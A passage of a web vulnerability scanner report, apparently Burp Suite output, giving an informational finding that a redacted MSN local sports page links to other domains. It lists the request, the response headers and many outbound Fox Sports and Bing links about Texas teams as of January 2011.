<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z155484965&quot;]&amp;form=MSNLAP">Everything's Bigger in Texas Party DUEX Super Celebrity Party</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&amp;resize=false">Feedback</a>
...[SNIP]...

22.126. http://local.redacted/sports.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /sports.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /sports.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:42 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3f0b19bf446b4984bc19db690bf53f0f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8BDA16619B44460EA4BD45956D672736; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344861&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fsports.aspx%3Fzip%3D75207%26q%3D75207&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75207">Yellow pages</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<td headers="gsport"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys" title="Dallas Cowboys"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/6.png" alt="Dallas Cowboys logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys">Dallas Cowboys</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Eagles-WR-Jackson-replaced-by-Austin-in-Pro-Bowl-52325786">Eagles WR Jackson replaced by Austin in Pro Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Goodell-skips-Pro-Bowl-to-focus-on-new-contract-60632089">Goodell skips Pro Bowl to focus on new contract</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Howdy-A-Big-D-welcome-to-Packers-Steelers-35730692">Howdy! A Big D welcome to Packers, Steelers</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611">Cowboys remove Garrett's interim tag</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/dallas-cowboys/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/team/houston-texans" title="Houston Texans"><img src="http://msn.foxsports.com/fe/img/NFL/TeamLogo/Large/34.png" alt="Houston Texans logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nfl/team/houston-texans">Houston Texans</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/story/Players-hoping-Pro-Bowl-stays-in-Hawaii-35210862">Players hoping Pro Bowl stays in Hawaii</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/NFL-NFC-AFC-Pro-Bowl-first-timers-soaking-it-all-in-012811">First-time Pro Bowlers soaking it all in</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/Brees-Zimmer-win-PFWA-Awards-52258753">AP's NFL Awards on NFL Network during SB week</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/story/AP-source-Texans-hire-Herring-to-coach-LBs-30897071">AP source: Texans hire Herring to coach LBs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nfl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nfl/team/houston-texans/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86111" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/85.png" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86111">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Unbeaten-TCU-stops-Wisconsin-2119-in-Rose-Bowl-96857989">Unbeaten TCU stops Wisconsin 21-19 in Rose Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/TCU-holds-off-Wisconsin-to-win-Rose-Bowl-">TCU wins one for the little guys </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/WisconsinTCU-Preview-82908187">Wisconsin-TCU Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Rose-Bowl-is-more-than-Badgers-size-Frogs-speed-90645669">Rose Bowl is more than Badgers' size, Frogs' speed</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86111">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86111">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86138" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/83.png" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86138">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/AP-AllAmerica-Team-List-25730143">AP All-America Team, List</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Texas-DE-Acho-wins-scholarathlete-award-52030010">Texas DE Acho wins scholar-athlete award</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Texas-Longhorns-lose-three-assistant-coaches-120610">Texas assistants leave after 5-7 season</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Nebraska-Oklahoma-State-lead-AP-All-Big-12-team-120210">Cowboys, Huskers lead AP All-Big 12</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86138">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86138">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86128" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/86.png" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86128">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-lawsuit-thrown-out-against-Texas-Tech-012111">Appeals court rules against Leach</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711">NCAA: Texas Tech broke recruiting rules</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411">Leach thought he was Terps match</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506">Texas Tech 45, Northwestern 38</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86128">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86112" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86112">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010">Army caps first winning season since '96</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926">Army-SMU Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410">UCF wins Conference USA championship</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645">UCF defeats SMU 17-7 to win Conference USA title</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86112">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86068" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86068">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018">Kansas St. 49, North Texas 41</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865">No. 13 Virginia Tech 37, Virginia 7</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195">Tuneup for Hokies is Cavaliers' bowl game</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730">Reserves key to titles, bowls for some ACC teams</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86068">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86127" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86127">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560">Canadian jumps from fire to pro football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026">Leshoure leads Illinois past Baylor in Texas Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910">Illinois finally tastes bowl victory</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273">Bears make first bowl appearance since 1994</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86127">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/houston-rockets" title="Houston Rockets"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png" alt="Houston Rockets logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/houston-rockets">Houston Rockets</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Rockets-96-Clippers-83-53563135">Rockets 96, Clippers 83</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks" title="Dallas Mavericks"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png" alt="Dallas Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/dallas-mavericks">Dallas Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/HawksMavericks-Preview-77679106">Hawks-Mavericks Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Mavericks-112-Clippers-105-88822399">Mavericks 112, Clippers 105</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs" title="San Antonio Spurs"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png" alt="San Antonio Spurs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs">San Antonio Spurs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/Weighing-Ws-and-Ls-vs-numbers-in-AllStar-votes-33069128">Weighing W's and L's vs numbers in All-Star votes</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Spurs-hand-Jazz-6th-straight-loss-012611">Spurs hand Jazz 6th straight loss</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/SpursJazz-Preview-36856822">Spurs-Jazz Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71871" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71871">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175">Baylor 70, Colorado 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281">Jimmermania highlights season's top performances</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486">Kansas St. 69, Baylor 61</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71871">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71650" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71650">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535">Louisiana-Lafayette 93, North Texas 88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539">Louisiana-Lafayette defeats North Texas 93-88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786">North Texas 83, Arkansas St. 64</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/North-Texas-79-LouisianaMonroe-62-59041039">North Texas 79, Louisiana-Monroe 62</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71650">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71926" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71926">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706">SMU 59, Tulsa 58</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346">SMU 79, Southern Miss. 65</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212">UAB 67, SMU 53</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Houston-70-SMU-68-53343248">Houston 70, SMU 68</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71926">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71780" title="Texas Arlington Mavericks"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif" alt="Texas Arlington Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71780">Texas Arlington Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240">Texas-Arlington 62, Stephen F.Austin 52</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869">Texas-Arlington 70, Texas A&amp;amp,M-Corpus Christi 49</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261">Lamar 76, Texas-Arlington 72</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-65-Sam-Houston-St-58-12896482">Texas-Arlington 65, Sam Houston St. 58</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71780">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71874" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71874">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/MissouriTexas-Preview-94031904">Missouri-Texas Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Sadler-must-look-beyond-borders-for-future-Huskers-50872138">Sadler must look beyond borders for future Huskers</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Texas-Longhorns-defeat-Oklahoma-State-on-10-year-crash-anniversary-012611">Cowboys honor those lost 10 years ago</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71874">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71872" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71872">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109">Texas Tech 92, Iowa St. 83</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-72-Nebraska-71-91656634">Texas Tech 72, Nebraska 71</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oklahoma-83-Texas-Tech-74-06947696">Oklahoma 83, Texas Tech 74</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/No-21-Kansas-St-94-Texas-Tech-60-93343325">No. 21 Kansas St. 94, Texas Tech 60</a>
...[SNIP]...
